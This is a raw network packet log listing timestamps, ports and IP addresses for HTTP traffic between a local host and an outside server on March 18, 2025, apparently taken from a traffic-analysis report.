                                                                  Mar 18, 2025 08:03:19.242856979 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.242856979 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.242885113 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.242898941 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.243349075 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.243360996 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.243376970 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.243388891 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.243398905 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.243405104 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.243421078 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.243432999 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.243448973 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.243480921 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.244151115 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.244163036 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.244174957 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.244205952 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.244232893 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.244537115 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.244555950 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.244569063 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.244585991 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.244600058 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.244600058 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.244610071 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.244622946 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.244632006 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.244633913 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.244652987 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.244668961 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.245434046 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.245445013 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.245455980 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.245477915 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.245507956 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:22.331729889 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:22.337497950 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:22.337635040 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:22.342149973 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:22.347493887 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.045909882 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.045932055 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.045943975 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.045954943 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.045986891 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.045998096 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.046010017 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.046020985 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.046030998 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.046035051 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.046035051 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.046044111 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.046080112 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.046080112 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.050818920 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.050837040 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.050920963 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.164920092 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.164938927 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.164949894 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165003061 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165045023 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165055990 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165055990 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.165055990 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.165066957 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165081024 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165113926 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.165113926 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.165957928 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165968895 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.165981054 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.166062117 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.166362047 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.166373014 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.166397095 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.166409016 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.166416883 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.166420937 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.166445971 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.166497946 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.167248011 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.167259932 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.167279005 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.167289972 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.167303085 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.167342901 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.167342901 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.221187115 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.283869982 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283890009 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283910036 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283925056 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283936024 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283946991 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283958912 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.283983946 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.283983946 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.284010887 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.284024000 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.284056902 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.284753084 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.284805059 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.284881115 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.285058975 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285070896 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285082102 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285094976 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285106897 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285118103 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285129070 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.285129070 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.285132885 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285151958 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.285177946 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.285929918 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285942078 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285953045 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.285995007 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286005974 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286010027 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.286017895 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286031961 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286039114 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.286113977 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.286828995 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286840916 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286853075 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286894083 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.286894083 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.286925077 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286936998 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286947012 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286958933 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.286986113 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.287025928 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.287652969 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.330555916 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.402841091 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.402859926 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.402874947 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.402901888 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.402913094 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.402960062 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.402960062 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.402972937 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403000116 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403033972 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.403040886 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403093100 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.403114080 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403175116 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403194904 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403234959 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.403283119 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403312922 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403323889 CET8049723176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:23.403340101 CET4972380192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:23.403445005 CET4972380192.168.2.4176.65.144.3
Mar 18, 2025 08:03:23.403522968 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.403537035 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.403544903 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.403565884 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.403580904 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.403594971 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.403608084 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.403621912 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.403621912 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.403652906 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.404088020 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404102087 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404115915 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404153109 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404155016 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.404167891 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404181004 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404198885 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.404254913 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.404268026 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404282093 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404294968 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404314995 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404324055 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.404350996 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.404869080 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404881954 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404895067 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.404930115 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.404952049 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.405021906 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.405035019 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.405046940 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.405066013 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.405080080 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.405109882 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.405112982 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.405128002 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.405142069 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.405165911 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.405167103 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.405215025 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.405834913 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.405848026 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.405863047 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.405903101 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.405982971 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.406008005 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.406022072 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.406034946 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.406049013 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.406059027 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.406061888 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.406078100 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.406083107 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.406094074 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.406095028 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.406147003 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.406758070 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.406831026 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.495167017 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.495183945 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.495269060 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522042036 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522100925 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522114992 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522130966 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522188902 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522192001 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522202969 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522217989 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522259951 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522300959 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522326946 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522326946 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522341013 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522353888 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522358894 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522376060 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522389889 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522403955 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522435904 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522589922 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522634029 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522646904 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522666931 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522689104 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522699118 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522702932 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522718906 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522733927 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522753954 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522779942 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522783995 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522806883 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522881985 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522895098 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522908926 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522919893 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522922039 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522937059 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522958994 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522969007 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522969007 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.522973061 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.522988081 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523005009 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.523052931 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.523556948 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523577929 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523600101 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523612976 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523626089 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523637056 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523647070 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523685932 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.523686886 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.523751974 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523772955 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523787022 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523801088 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523823977 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523829937 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.523839951 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523852110 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.523854971 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523870945 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523874998 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.523885965 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523906946 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.523909092 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.523948908 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.524452925 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524466038 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524480104 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524518967 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.524522066 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524537086 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524545908 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.524552107 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524568081 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524599075 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.524616003 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.524677992 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524691105 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524707079 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524729013 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524744034 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524760962 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:23.524784088 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524797916 CET | 80 | 49723 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:23.524797916 CET | 49723 | 80 | 192.168.2.4 | 176.65.144.3
